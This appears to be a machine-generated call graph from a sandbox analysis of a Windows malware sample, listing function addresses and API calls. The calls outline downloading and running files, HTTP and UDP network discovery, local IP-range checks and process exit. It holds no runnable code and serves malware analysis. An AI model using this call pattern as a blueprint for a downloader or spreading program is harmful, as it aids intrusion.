4414->4427 4416 405c19 MapViewOfFile 4415->4416 4417 405cdb CloseHandle 4415->4417 4418 405cd1 CloseHandle 4416->4418 4419 405c38 GetFileSize 4416->4419 4417->4414 4418->4417 4421 405c4d 4419->4421 4420 405cc7 UnmapViewOfFile 4420->4418 4421->4420 4423 405c8c 4421->4423 4426 405c5c 4421->4426 4645 40c820 4421->4645 4652 405cf0 4421->4652 4424 40a1b0 __aligned_recalloc_base 3 API calls 4423->4424 4424->4426 4426->4420 4959 40d710 socket 4427->4959 4429 407a25 4440 406fe0 CoInitializeEx SysAllocString 4429->4440 4432 40d6aa 4984 40aa80 htons 4432->4984 4433 40d660 4433->4429 4433->4432 4439 40d6e8 4433->4439 4969 40d980 4433->4969 4438 40e470 24 API calls 4438->4439 5003 40a2d0 4439->5003 4441 407002 4440->4441 4442 407018 CoUninitialize 4440->4442 5148 407030 4441->5148 4442->4388 5157 40bec0 4445->5157 4448 40bec0 3 API calls 4449 40bf1e 4448->4449 4450 40bec0 3 API calls 4449->4450 4451 40bf2e 4450->4451 4452 40bec0 3 API calls 4451->4452 4453 407a42 4452->4453 4454 40d130 4453->4454 4455 409d90 7 API calls 4454->4455 4456 40d13b 4455->4456 4457 407a4c 4456->4457 4458 40d147 InitializeCriticalSection 4456->4458 4459 40b2c0 InitializeCriticalSection 4457->4459 4458->4457 4464 40b2da 4459->4464 4460 40b309 CreateFileW 4462 40b330 CreateFileMappingW 4460->4462 4463 40b3f2 4460->4463 4466 40b351 MapViewOfFile 4462->4466 4467 40b3e8 CloseHandle 4462->4467 5212 40ab60 EnterCriticalSection 4463->5212 4464->4460 5164 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4464->5164 5165 40aea0 4464->5165 4470 40b36c GetFileSize 4466->4470 4471 40b3de CloseHandle 4466->4471 4467->4463 4469 40b3f7 4472 40d160 339 API calls 4469->4472 4477 40b38b 4470->4477 4471->4467 4474 407a56 4472->4474 4473 40b3d4 UnmapViewOfFile 4473->4471 4478 40d160 4474->4478 4476 40aea0 32 API calls 4476->4477 4477->4473 4477->4476 5215 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4477->5215 4479 40d177 EnterCriticalSection 4478->4479 4480 407a6f 4478->4480 5240 40d250 4479->5240 4480->4400 4483 40d23b LeaveCriticalSection 4483->4480 4484 409fe0 9 API calls 4485 40d1b9 4484->4485 4485->4483 4486 40d1cb CreateThread 4485->4486 4486->4483 4487 40d1ee 4486->4487 5245 40d550 4486->5245 5256 401f50 GetQueuedCompletionStatus 4486->5256 5263 40d5f0 4486->5263 5270 40cf00 4486->5270 5277 40b420 4486->5277 5283 401920 GetTickCount WaitForSingleObject 4486->5283 5306 40ceb0 4486->5306 4488 40d212 GetCurrentProcess GetCurrentProcess DuplicateHandle 4487->4488 4489 40d234 4487->4489 4488->4489 4489->4483 4491 40d306 InterlockedExchangeAdd 4490->4491 4492 40d3e9 GetCurrentThread SetThreadPriority 4490->4492 4491->4492 4497 40d320 4491->4497 4492->4407 4493 40d339 EnterCriticalSection 4493->4497 4494 40d3a7 LeaveCriticalSection 4496 40d3be 4494->4496 4494->4497 4495 40d383 WaitForSingleObject 4495->4497 4496->4492 4497->4492 4497->4493 4497->4494 4497->4495 4497->4496 4498 40d3dc Sleep 4497->4498 4498->4497 4500 407678 4499->4500 4500->4364 4500->4365 4502 40e9f1 ShellExecuteW 4501->4502 4503 40e9e2 Sleep 4501->4503 4505 40ea26 4502->4505 4506 40ea17 Sleep 4502->4506 4504 407766 4503->4504 4504->4367 4504->4386 4505->4504 4506->4504 4508 40d41c EnterCriticalSection 4507->4508 4515 407ae1 4507->4515 4509 40d438 4508->4509 4510 40d460 LeaveCriticalSection DeleteCriticalSection 4509->4510 4511 40d44b CloseHandle 4509->4511 4512 40a1b0 __aligned_recalloc_base 3 API calls 4510->4512 4511->4509 4513 40d486 4512->4513 4514 40a1b0 __aligned_recalloc_base 3 API calls 4513->4514 4514->4515 4515->4362 4519 40c3f0 4516->4519 4520 40c423 4519->4520 4521 40c40e 4519->4521 4523 40796a 4520->4523 4525 40c5d0 4520->4525 4559 40c450 4521->4559 4523->4362 4523->4363 4526 40c5f9 4525->4526 4527 40c6aa 4525->4527 4528 40c6a2 4526->4528 4585 409d90 4526->4585 4527->4528 4531 409d90 7 API calls 4527->4531 4528->4523 4532 40c6ce 4531->4532 4532->4528 4535 402420 7 API calls 4532->4535 4537 40c6f2 4535->4537 4536 409d90 7 API calls 4538 40c642 4536->4538 4539 409d90 7 API calls 4537->4539 4593 4024e0 4538->4593 4541 40c701 4539->4541 4543 4024e0 10 API calls 4541->4543 4542 40c66b 4596 40a1b0 4542->4596 4545 40c72a 4543->4545 4547 40a1b0 __aligned_recalloc_base 3 API calls 4545->4547 4549 40c736 4547->4549 4548 402420 7 API calls 4550 40c688 4548->4550 4551 402420 7 API calls 4549->4551 4552 4024e0 10 API calls 4550->4552 4553 40c747 4551->4553 4552->4528 4554 4024e0 10 API calls 4553->4554 4555 40c761 4554->4555 4556 402420 7 API calls 4555->4556 4557 40c772 4556->4557 4558 4024e0 10 API calls 4557->4558 4558->4528 4560 40c502 4559->4560 4561 40c479 4559->4561 4563 409d90 7 API calls 4560->4563 4584 40c4fa 4560->4584 4562 409d90 7 API calls 4561->4562 4561->4584 4564 40c48c 4562->4564 4565 40c528 4563->4565 4566 402420 7 API calls 4564->4566 4564->4584 4567 402420 7 API calls 4565->4567 4565->4584 4568 40c4b5 4566->4568 4569 40c555 4567->4569 4570 4024e0 10 API calls 4568->4570 4571 4024e0 10 API calls 4569->4571 4572 40c4cf 4570->4572 4573 40c56f 4571->4573 4574 402420 7 API calls 4572->4574 4575 402420 7 API calls 4573->4575 4576 40c4e0 4574->4576 4577 40c580 4575->4577 4578 4024e0 10 API calls 4576->4578 4579 4024e0 10 API calls 4577->4579 4578->4584 4580 40c59a 4579->4580 4581 402420 7 API calls 4580->4581 4582 40c5ab 4581->4582 4583 4024e0 10 API calls 4582->4583 4583->4584 4584->4523 4603 409db0 4585->4603 4588 402420 4624 409fa0 4588->4624 4631 402540 4593->4631 4595 4024ff __aligned_recalloc_base 4595->4542 4641 409e50 GetCurrentProcessId 4596->4641 4598 40a1bb 4599 40a1c2 4598->4599 4642 40a0f0 4598->4642 4599->4548 4602 40a1d7 RtlFreeHeap 4602->4599 4612 409e50 GetCurrentProcessId 4603->4612 4605 409dbb 4606 409dc7 __aligned_recalloc_base 4605->4606 4613 409e70 4605->4613 4608 409d9e 4606->4608 4609 409de2 RtlAllocateHeap 4606->4609 4608->4528 4608->4588 4609->4608 4610 409e09 __aligned_recalloc_base 4609->4610 4610->4608 4611 409e24 memset 4610->4611 4611->4608 4612->4605 4621 409e50 GetCurrentProcessId 4613->4621 4615 409e79 4616 409e96 HeapCreate 4615->4616 4622 409ee0 GetProcessHeaps 4615->4622 4618 409eb0 HeapSetInformation GetCurrentProcessId 4616->4618 4619 409ed7 4616->4619 4618->4619 4619->4606 4621->4615 4623 409e8c 4622->4623 4623->4616 4623->4619 4625 409db0 __aligned_recalloc_base 7 API calls 4624->4625 4626 40242b 4625->4626 4627 402820 4626->4627 4628 40282a 4627->4628 4629 409fa0 __aligned_recalloc_base 7 API calls 4628->4629 4630 402438 4629->4630 4630->4536 4632 40258e 4631->4632 4634 402551 4631->4634 4633 409fa0 __aligned_recalloc_base 7 API calls 4632->4633 4632->4634 4637 4025b2 _invalid_parameter 4633->4637 4634->4595 4635 4025e2 memcpy 4636 402606 _invalid_parameter 4635->4636 4639 40a1b0 __aligned_recalloc_base 3 API calls 4636->4639 4637->4635 4638 40a1b0 __aligned_recalloc_base 3 API calls 4637->4638 4640 4025df 4638->4640 4639->4634 4640->4635 4641->4598 4643 40a120 HeapValidate 4642->4643 4644 40a140 4642->4644 4643->4644 4644->4599 4644->4602 4662 40a220 4645->4662 4648 40c861 4648->4421 4651 40a1b0 __aligned_recalloc_base 3 API calls 4651->4648 4875 409fe0 4652->4875 4655 405d2a memcpy 4657 40a220 8 API calls 4655->4657 4656 405de8 4656->4421 4658 405d61 4657->4658 4885 40c190 4658->4885 4663 40a24d 4662->4663 4664 409fa0 __aligned_recalloc_base 7 API calls 4663->4664 4665 40a262 4663->4665 4666 40a264 memcpy 4663->4666 4664->4663 4665->4648 4667 40bd30 4665->4667 4666->4663 4675 40bd3a 4667->4675 4669 40bd59 4669->4648 4669->4651 4671 40bd71 memcmp 4671->4675 4672 40bd98 4673 40a1b0 __aligned_recalloc_base 3 API calls 4672->4673 4673->4669 4674 40a1b0 __aligned_recalloc_base 3 API calls 4674->4675 4675->4669 4675->4671 4675->4672 4675->4674 4676 40c220 4675->4676 4690 407af0 4675->4690 4677 40c22f __aligned_recalloc_base 4676->4677 4678 409fa0 __aligned_recalloc_base 7 API calls 4677->4678 4680 40c239 4677->4680 4679 40c2c8 4678->4679 4679->4680 4681 402420 7 API calls 4679->4681 4680->4675 4682 40c2dd 4681->4682 4683 402420 7 API calls 4682->4683 4684 40c2e5 4683->4684 4686 40c33d __aligned_recalloc_base 4684->4686 4693 40c390 4684->4693 4698 402470 4686->4698 4689 402470 3 API calls 4689->4680 4806 409d10 4690->4806 4694 4024e0 10 API calls 4693->4694 4695 40c3a4 4694->4695 4704 4026f0 4695->4704 4697 40c3bc 4697->4684 4699 402484 _invalid_parameter 4698->4699 4701 4024ce 4698->4701 4702 40a1b0 __aligned_recalloc_base 3 API calls 4699->4702 4703 4024ac 4699->4703 4700 40a1b0 __aligned_recalloc_base 3 API calls 4700->4701 4701->4689 4702->4703 4703->4700 4707 402710 4704->4707 4706 40270a 4706->4697 4708 402724 4707->4708 4709 402540 __aligned_recalloc_base 10 API calls 4708->4709 4710 40276d 4709->4710 4711 402540 __aligned_recalloc_base 10 API calls 4710->4711 4712 40277d 4711->4712 4713 402540 __aligned_recalloc_base 10 API calls 4712->4713 4714 40278d 4713->4714 4715 402540 __aligned_recalloc_base 10 API calls 4714->4715 4716 40279d 4715->4716 4717 4027a6 4716->4717 4718 4027cf 4716->4718 4722 403e20 4717->4722 4739 403df0 4718->4739 4721 4027c7 __aligned_recalloc_base 4721->4706 4723 402820 _invalid_parameter 7 API calls 4722->4723 4724 403e37 4723->4724 4725 402820 _invalid_parameter 7 API calls 4724->4725 4726 403e46 4725->4726 4727 402820 _invalid_parameter 7 API calls 4726->4727 4728 403e55 4727->4728 4729 402820 _invalid_parameter 7 API calls 4728->4729 4730 403e64 _invalid_parameter __aligned_recalloc_base 4729->4730 4732 40400f _invalid_parameter 4730->4732 4742 402850 4730->4742 4733 402850 _invalid_parameter 3 API calls 4732->4733 4734 404035 _invalid_parameter 4732->4734 4733->4732 4735 402850 _invalid_parameter 3 API calls 4734->4735 4736 40405b _invalid_parameter 4734->4736 4735->4734 4737 402850 _invalid_parameter 3 API calls 4736->4737 4738 404081 4736->4738 4737->4736 4738->4721 4746 404090 4739->4746 4741 403e0c 4741->4721 4743 402866 4742->4743 4744 40285b 4742->4744 4743->4730 4745 40a1b0 __aligned_recalloc_base 3 API calls 4744->4745 4745->4743 4747 4040a6 _invalid_parameter 4746->4747 4748 4040b8 _invalid_parameter 4747->4748 4749 4040dd 4747->4749 4751 404103 4747->4751 4748->4741 4776 403ca0 4749->4776 4752 40413d 4751->4752 4753 40415e 4751->4753 4786 404680 4752->4786 4755 402820 _invalid_parameter 7 API calls 4753->4755 4756 40416f 4755->4756 4757 402820 _invalid_parameter 7 API calls 4756->4757 4758 40417e 4757->4758 4759 402820 _invalid_parameter 7 API calls 4758->4759 4760 40418d 4759->4760 4761 402820 _invalid_parameter 7 API calls 4760->4761 4762 40419c 4761->4762 4799 403d70 4762->4799 4764 402820 _invalid_parameter 7 API calls 4765 4041ca _invalid_parameter 4764->4765 4765->4764 4766 404284 _invalid_parameter __aligned_recalloc_base 4765->4766 4767 402850 _invalid_parameter 3 API calls 4766->4767 4768 4045a3 _invalid_parameter 4766->4768 4767->4766 4769 402850 _invalid_parameter 3 API calls 4768->4769 4770 4045c9 _invalid_parameter 4768->4770 4769->4768 4771 402850 _invalid_parameter 3 API calls 4770->4771 4772 4045ef _invalid_parameter 4770->4772 4771->4770 4773 402850 _invalid_parameter 3 API calls 4772->4773 4774 404615 _invalid_parameter 4772->4774 4773->4772 4774->4748 4775 402850 _invalid_parameter 3 API calls 4774->4775 4775->4774 4777 403cae 4776->4777 4778 402820 _invalid_parameter 7 API calls 4777->4778 4779 403ccb 4778->4779 4780 402820 _invalid_parameter 7 API calls 4779->4780 4781 403cda _invalid_parameter 4780->4781 4782 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4781->4782 4783 403d3a _invalid_parameter 4781->4783 4782->4781 4784 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4783->4784 4785 403d60 4783->4785 4784->4783 4785->4748 4787 402820 _invalid_parameter 7 API calls 4786->4787 4788 404697 4787->4788 4789 402820 _invalid_parameter 7 API calls 4788->4789 4790 4046a6 4789->4790 4791 402820 _invalid_parameter 7 API calls 4790->4791 4798 4046b5 _invalid_parameter __aligned_recalloc_base 4791->4798 4792 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4792->4798 4793 404841 _invalid_parameter 4794 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4793->4794 4795 404867 _invalid_parameter 4793->4795 4794->4793 4796 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4795->4796 4797 40488d 4795->4797 4796->4795 4797->4748 4798->4792 4798->4793 4800 402820 _invalid_parameter 7 API calls 4799->4800 4801 403d7f _invalid_parameter 4800->4801 4802 403ca0 _invalid_parameter 9 API calls 4801->4802 4803 403db8 _invalid_parameter 4802->4803 4804 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4803->4804 4805 403de3 4803->4805 4804->4803 4805->4765 4807 409d22 4806->4807 4810 409c70 4807->4810 4811 409fa0 __aligned_recalloc_base 7 API calls 4810->4811 4812 409c80 4811->4812 4814 409cbc 4812->4814 4817 407b0f 4812->4817 4819 4091a0 4812->4819 4826 409790 4812->4826 4831 409b60 4812->4831 4816 40a1b0 __aligned_recalloc_base 3 API calls 4814->4816 4816->4817 4817->4675 4820 4091b3 4819->4820 4825 4091a9 4819->4825 4821 4091f6 memset 4820->4821 4820->4825 4822 409217 4821->4822 4821->4825 4823 40921d memcpy 4822->4823 4822->4825 4839 408f70 4823->4839 4825->4812 4827 40979d 4826->4827 4828 4097a7 4826->4828 4827->4812 4828->4827 4829 40989f memcpy 4828->4829 4844 4094c0 4828->4844 4829->4828 4833 409b76 4831->4833 4837 409b6c 4831->4837 4832 4094c0 64 API calls 4834 409bf7 4832->4834 4833->4832 4833->4837 4835 408f70 6 API calls 4834->4835 4834->4837 4836 409c16 4835->4836 4836->4837 4838 409c2b memcpy 4836->4838 4837->4812 4838->4837 4840 408fbe 4839->4840 4842 408f7e 4839->4842 4840->4825 4842->4840 4843 408eb0 6 API calls 4842->4843 4843->4842 4845 4094d0 4844->4845 4846 4094da 4844->4846 4845->4828 4846->4845 4854 409300 4846->4854 4849 409618 memcpy 4849->4845 4851 409637 memcpy 4852 409761 4851->4852 4853 4094c0 62 API calls 4852->4853 4853->4845 4855 40930d 4854->4855 4856 409317 4854->4856 4855->4845 4855->4849 4855->4851 4856->4855 4857 4093a0 4856->4857 4859 4093a5 4856->4859 4860 409388 4856->4860 4865 408c60 4857->4865 4861 408f70 6 API calls 4859->4861 4863 408f70 6 API calls 4860->4863 4861->4857 4863->4857 4864 40944c memset 4864->4855 4866 408c79 4865->4866 4871 408c6f 4865->4871 4867 408b30 9 API calls 4866->4867 4866->4871 4869 408d72 4867->4869 4868 409fa0 __aligned_recalloc_base 7 API calls 4870 408dc1 4868->4870 4869->4868 4870->4871 4872 4089a0 46 API calls 4870->4872 4871->4855 4871->4864 4873 408dee 4872->4873 4874 40a1b0 __aligned_recalloc_base GetCurrentProcessId HeapValidate RtlFreeHeap 4873->4874 4874->4871 4894 409e50 GetCurrentProcessId 4875->4894 4877 409feb 4878 409e70 __aligned_recalloc_base 5 API calls 4877->4878 4883 409ff7 __aligned_recalloc_base 4877->4883 4878->4883 4879 40a0f0 __aligned_recalloc_base HeapValidate 4879->4883 4880 40a0a0 HeapAlloc 4880->4883 4881 40a06a HeapReAlloc 4881->4883 4882 40a1b0 __aligned_recalloc_base 3 API calls 4882->4883 4883->4879 4883->4880 4883->4881 4883->4882 4884 405d15 4883->4884 4884->4655 4884->4656 4888 40c19b 4885->4888 4886 409fa0 __aligned_recalloc_base 7 API calls 4886->4888 4887 405dad 4887->4656 4889 407310 4887->4889 4888->4886 4888->4887 4890 409fa0 __aligned_recalloc_base 7 API calls 4889->4890 4891 407320 4890->4891 4892 407367 4891->4892 4893 40732c memcpy CreateThread CloseHandle 4891->4893 4892->4656 4893->4892 4895 407370 GetTickCount srand rand Sleep 4893->4895 4894->4877 4896 4073fd 4895->4896 4897 4073a7 4895->4897 4898 4073fb 4896->4898 4900 40eae0 61 API calls 4896->4900 4897->4898 4899 4073b6 StrChrA 4897->4899 4905 40eae0 9 API calls 4897->4905 4901 40a1b0 __aligned_recalloc_base 3 API calls 4898->4901 4899->4897 4900->4898 4902 407428 4901->4902 4906 40ed03 InternetCloseHandle Sleep 4905->4906 4907 40eba3 InternetOpenUrlW 4905->4907 4910 4073e5 Sleep 4906->4910 4911 40ed2a 6 API calls 4906->4911 4908 40ebd2 CreateFileW 4907->4908 4909 40ecf6 InternetCloseHandle 4907->4909 4912 40ec01 InternetReadFile 4908->4912 4913 40ece9 CloseHandle 4908->4913 4909->4906 4910->4897 4911->4910 4914 40eda6 wsprintfW DeleteFileW 4911->4914 4915 40ec54 CloseHandle wsprintfW DeleteFileW 4912->4915 4916 40ec25 4912->4916 4913->4909 4917 40e7c0 21 API calls 4914->4917 4934 40e7c0 CreateFileW 4915->4934 4916->4915 4918 40ec2e WriteFile 4916->4918 4920 40eddb 4917->4920 4918->4912 4922 40ede5 Sleep 4920->4922 4923 40ee19 DeleteFileW 4920->4923 4926 40e980 6 API calls 4922->4926 4923->4910 4924 40eca0 Sleep 4927 40e980 6 API calls 4924->4927 4925 40ecdc DeleteFileW 4925->4913 4928 40edfc 4926->4928 4929 40ecb7 4927->4929 4928->4910 4932 40ee0f ExitProcess 4928->4932 4930 40ecc2 4929->4930 4931 40ecd3 4929->4931 4930->4931 4933 40eccb ExitProcess 4930->4933 4931->4913 4935 40e805 CreateFileMappingW 4934->4935 4936 40e91a 4934->4936 4937 40e910 CloseHandle 4935->4937 4938 40e826 MapViewOfFile 4935->4938 4939 40e920 CreateFileW 4936->4939 4947 40e971 4936->4947 4937->4936 4940 40e845 GetFileSize 4938->4940 4941 40e906 CloseHandle 4938->4941 4942 40e942 WriteFile CloseHandle 4939->4942 4943 40e968 4939->4943 4945 40e861 4940->4945 4946 40e8fc UnmapViewOfFile 4940->4946 4941->4937 4942->4943 4944 40a1b0 __aligned_recalloc_base 3 API calls 4943->4944 4944->4947 4956 40c7f0 4945->4956 4946->4941 4947->4924 4947->4925 4950 40c190 7 API calls 4951 40e8b0 4950->4951 4951->4946 4952 40e8cd memcmp 4951->4952 4952->4946 4953 40e8e9 4952->4953 4954 40a1b0 __aligned_recalloc_base 3 API calls 4953->4954 4955 40e8f2 4954->4955 4955->4946 4957 40c220 10 API calls 4956->4957 4958 40c814 4957->4958 4958->4946 4958->4950 4960 40d73d htons inet_addr setsockopt 4959->4960 4966 40d86e 4959->4966 4961 40aa80 8 API calls 4960->4961 4962 40d7b6 bind lstrlenA sendto ioctlsocket 4961->4962 4967 40d80b 4962->4967 4963 40d832 5016 40ab40 shutdown closesocket 4963->5016 4966->4433 4967->4963 4968 409fe0 9 API calls 4967->4968 5007 40d890 4967->5007 4968->4967 5023 40dbc0 memset InternetCrackUrlA InternetOpenA 4969->5023 4972 40da9e 4972->4433 4974 40a1b0 __aligned_recalloc_base 3 API calls 4974->4972 4978 40da6b 4978->4974 4981 40da61 SysFreeString 4981->4978 5130 40aa40 inet_addr 4984->5130 4987 40aadc connect 4988 40aaf0 getsockname 4987->4988 4989 40ab24 4987->4989 4988->4989 5133 40ab40 shutdown closesocket 4989->5133 4991 40ab2d 4992 40e470 4991->4992 5134 40aa20 inet_ntoa 4992->5134 4994 40e486 4995 40c9f0 11 API calls 4994->4995 4996 40e4a5 4995->4996 4997 40d6cc 4996->4997 5135 40e4f0 memset InternetCrackUrlA InternetOpenA 4996->5135 4997->4438 5000 40e4dc 5002 40a1b0 __aligned_recalloc_base 3 API calls 5000->5002 5001 40a1b0 __aligned_recalloc_base 3 API calls 5001->5000 5002->4997 5005 40a2d4 5003->5005 5004 40a2da 5004->4429 5005->5004 5006 40a1b0 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5005->5006 5006->5005 5015 40d8ac 5007->5015 5008 40d974 5008->4967 5009 40d8c8 recvfrom 5010 40d8f6 StrCmpNIA 5009->5010 5011 40d8e9 Sleep 5009->5011 5012 40d915 StrStrIA 5010->5012 5010->5015 5011->5015 5013 40d936 StrChrA 5012->5013 5012->5015 5017 40c8a0 5013->5017 5015->5008 5015->5009 5016->4966 5018 40c8ab 5017->5018 5019 40c8b1 lstrlenA 5018->5019 5020 409fa0 __aligned_recalloc_base 7 API calls 5018->5020 5021 40c8e0 memcpy 5018->5021 5022 40c8c4 5018->5022 5019->5018 5019->5022 5020->5018 5021->5018 5021->5022 5022->5015 5024 40dc61 InternetConnectA 5023->5024 5025 40d99a 5023->5025 5026 40ddca InternetCloseHandle 5024->5026 5027 40dc9a HttpOpenRequestA 5024->5027 5025->4972 5036 40dab0 5025->5036 5026->5025 5028 40dcd0 HttpSendRequestA 5027->5028 5029 40ddbd InternetCloseHandle 5027->5029 5030 40ddb0 InternetCloseHandle 5028->5030 5032 40dced 5028->5032 5029->5026 5030->5029 5031 40dd0e InternetReadFile 5031->5032 5033 40dd3b 5031->5033 5032->5031 5032->5033 5034 409fe0 9 API calls 5032->5034 5033->5030 5035 40dd56 memcpy 5034->5035 5035->5032 5065 405690 5036->5065 5039 40dada SysAllocString 5040 40daf1 CoCreateInstance 5039->5040 5041 40dba7 5039->5041 5042 40db9d SysFreeString 5040->5042 5045 40db16 5040->5045 5043 40a1b0 __aligned_recalloc_base 3 API calls 5041->5043 5042->5041 5044 40d9b3 5043->5044 5044->4978 5046 40e420 5044->5046 5045->5042 5082 40df70 5046->5082 5049 40ddf0 5087 40e240 5049->5087 5054 40e3a0 6 API calls 5055 40de47 5054->5055 5061 40da32 5055->5061 5104 40e060 5055->5104 5058 40de7f 5058->5061 5109 40df10 5058->5109 5059 40e060 6 API calls 5059->5058 5061->4981 5062 40c9f0 5061->5062 5125 40c960 5062->5125 5070 40569d 5065->5070 5066 4056a3 lstrlenA 5066->5070 5071 4056b6 5066->5071 5068 409fa0 __aligned_recalloc_base 7 API calls 5068->5070 5070->5066 5070->5068 5070->5071 5072 40a1b0 __aligned_recalloc_base 3 API calls 5070->5072 5073 405630 5070->5073 5077 4055e0 5070->5077 5071->5039 5071->5044 5072->5070 5074 405647 MultiByteToWideChar 5073->5074 5075 40563a lstrlenA 5073->5075 5076 40566c 5074->5076 5075->5074 5076->5070 5078 4055eb 5077->5078 5079 4055f1 lstrlenA 5078->5079 5080 405630 2 API calls 5078->5080 5081 405627 5078->5081 5079->5078 5080->5078 5081->5070 5085 40df96 5082->5085 5083 40da1d 5083->4978 5083->5049 5084 40e013 lstrcmpiW 5084->5085 5086 40e02b SysFreeString 5084->5086 5085->5083 5085->5084 5085->5086 5086->5085 5089 40e266 5087->5089 5088 40de0b 5088->5061 5099 40e3a0 5088->5099 5089->5088 5090 40e2f3 lstrcmpiW 5089->5090 5091 40e373 SysFreeString 5090->5091 5092 40e306 5090->5092 5091->5088 5093 40df10 2 API calls 5092->5093 5095 40e314 5093->5095 5094 40e365 5094->5091 5095->5091 5095->5094 5096 40e343 lstrcmpiW 5095->5096 5097 40e355 5096->5097 5098 40e35b SysFreeString 5096->5098 5097->5098 5098->5094 5100 40df10 2 API calls 5099->5100 5102 40e3bb 5100->5102 5101 40de29 5101->5054 5101->5061 5102->5101 5103 40e240 6 API calls 5102->5103 5103->5101 5105 40df10 2 API calls 5104->5105 5106 40e07b 5105->5106 5108 40de65 5106->5108 5113 40e0e0 5106->5113 5108->5058 5108->5059 5111 40df36 5109->5111 5110 40df4d 5110->5061 5111->5110 5112 40df70 2 API calls 5111->5112 5112->5110 5115 40e106 5113->5115 5114 40e21d 5114->5108 5115->5114 5116 40e193 lstrcmpiW 5115->5116 5117 40e213 SysFreeString 5116->5117 5118 40e1a6 5116->5118 5117->5114 5119 40df10 2 API calls 5118->5119 5121 40e1b4 5119->5121 5120 40e205 5120->5117 5121->5117 5121->5120 5122 40e1e3 lstrcmpiW 5121->5122 5123 40e1f5 5122->5123 5124 40e1fb SysFreeString 5122->5124 5123->5124 5124->5120 5129 40c96d 5125->5129 5126 40c910 _vscprintf wvsprintfA 5126->5129 5127 40c988 SysFreeString 5127->4981 5128 409fe0 9 API calls 5128->5129 5129->5126 5129->5127 5129->5128 5131 40aa6c socket 5130->5131 5132 40aa59 gethostbyname 5130->5132 5131->4987 5131->4991 5132->5131 5133->4991 5134->4994 5136 40e4c7 5135->5136 5137 40e594 InternetConnectA 5135->5137 5136->5000 5136->5001 5138 40e714 InternetCloseHandle 5137->5138 5139 40e5cd HttpOpenRequestA 5137->5139 5138->5136 5140 40e603 HttpAddRequestHeadersA HttpSendRequestA 5139->5140 5141 40e707 InternetCloseHandle 5139->5141 5142 40e6fa InternetCloseHandle 5140->5142 5143 40e64d 5140->5143 5141->5138 5142->5141 5144 40e664 InternetReadFile 5143->5144 5145 40e691 5143->5145 5146 409fe0 9 API calls 5143->5146 5144->5143 5144->5145 5145->5142 5147 40e6ac memcpy 5146->5147 5147->5143 5154 407067 5148->5154 5149 4072c0 CoCreateInstance 5149->5154 5150 40723b 5152 407244 SysFreeString 5150->5152 5153 40700b SysFreeString 5150->5153 5151 40a1b0 __aligned_recalloc_base 3 API calls 5151->5150 5152->5153 5153->4442 5154->5149 5155 4071b6 SysAllocString 5154->5155 5156 407082 5154->5156 5155->5154 5155->5156 5156->5150 5156->5151 5158 40beca 5157->5158 5159 40bece 5157->5159 5158->4448 5161 40be80 CryptAcquireContextW 5159->5161 5162 40bebb 5161->5162 5163 40be9d CryptGenRandom CryptReleaseContext 5161->5163 5162->5158 5163->5162 5164->4464 5216 40add0 gethostname 5165->5216 5168 40aeb9 5168->4464 5170 40aecc strcmp 5170->5168 5171 40aee1 5170->5171 5220 40aa20 inet_ntoa 5171->5220 5173 40aeef strstr 5174 40af40 5173->5174 5175 40aeff 5173->5175 5221 40aa20 inet_ntoa 5174->5221 5223 40aa20 inet_ntoa 5175->5223 5178 40af4e strstr 5180 40af5e 5178->5180 5181 40af9f 5178->5181 5179 40af0d strstr 5179->5168 5182 40af1d 5179->5182 5225 40aa20 inet_ntoa 5180->5225 5222 40aa20 inet_ntoa 5181->5222 5224 40aa20 inet_ntoa 5182->5224 5186 40af6c strstr 5186->5168 5189 40af7c 5186->5189 5187 40afad strstr 5190 40afbd 5187->5190 5191 40affe EnterCriticalSection 5187->5191 5188 40af2b strstr 5188->5168 5188->5174 5226 40aa20 inet_ntoa 5189->5226 5227 40aa20 inet_ntoa 5190->5227 5192 40b016 5191->5192 5201 40b041 5192->5201 5229 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5192->5229 5195 40afcb strstr 5195->5168 5197 40afdb 5195->5197 5196 40af8a strstr 5196->5168 5196->5181 5228 40aa20 inet_ntoa 5197->5228 5200 40b13a LeaveCriticalSection 5200->5168 5201->5200 5203 409d90 7 API calls 5201->5203 5202 40afe9 strstr 5202->5168 5202->5191 5204 40b085 5203->5204 5204->5200 5230 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5204->5230 5206 40b0a3 5207 40b0d0 5206->5207 5208 40b0c6 Sleep 5206->5208 5210 40b0f5 5206->5210 5209 40a1b0 __aligned_recalloc_base 3 API calls 5207->5209 5208->5206 5209->5210 5210->5200 5231 40ab80 5210->5231 5213 40ab80 14 API calls 5212->5213 5214 40ab73 LeaveCriticalSection 5213->5214 5214->4469 5215->4477 5217 40adf7 gethostbyname 5216->5217 5218 40ae13 5216->5218 5217->5218 5218->5168 5219 40aa20 inet_ntoa 5218->5219 5219->5170 5220->5173 5221->5178 5222->5187 5223->5179 5224->5188 5225->5186 5226->5196 5227->5195 5228->5202 5229->5201 5230->5206 5232 40ab94 5231->5232 5233 40ab8f 5231->5233 5234 409fa0 __aligned_recalloc_base 7 API calls 5232->5234 5233->5200 5236 40aba8 5234->5236 5235 40ac04 CreateFileW 5237 40ac53 InterlockedExchange 5235->5237 5238 40ac27 WriteFile FlushFileBuffers CloseHandle 5235->5238 5236->5233 5236->5235 5239 40a1b0 __aligned_recalloc_base 3 API calls 5237->5239 5238->5237 5239->5233 5241 40d25d 5240->5241 5242 40d193 5241->5242 5243 40d281 WaitForSingleObject 5241->5243 5242->4483 5242->4484 5243->5241 5244 40d29c CloseHandle 5243->5244 5244->5241 5312 4013b0 5245->5312 5247 40d5e0 5249 40d55d 5249->5247 5250 40d577 InterlockedExchangeAdd 5249->5250 5251 40d5bb WaitForSingleObject 5249->5251 5325 40b200 EnterCriticalSection 5249->5325 5330 40b520 5249->5330 5250->5249 5250->5251 5251->5249 5252 40d5d4 5251->5252 5333 401330 5252->5333 5257 401f92 5256->5257 5262 402008 5256->5262 5258 401f97 WSAGetOverlappedResult 5257->5258 5412 401d60 5257->5412 5258->5257 5260 401fb9 WSAGetLastError 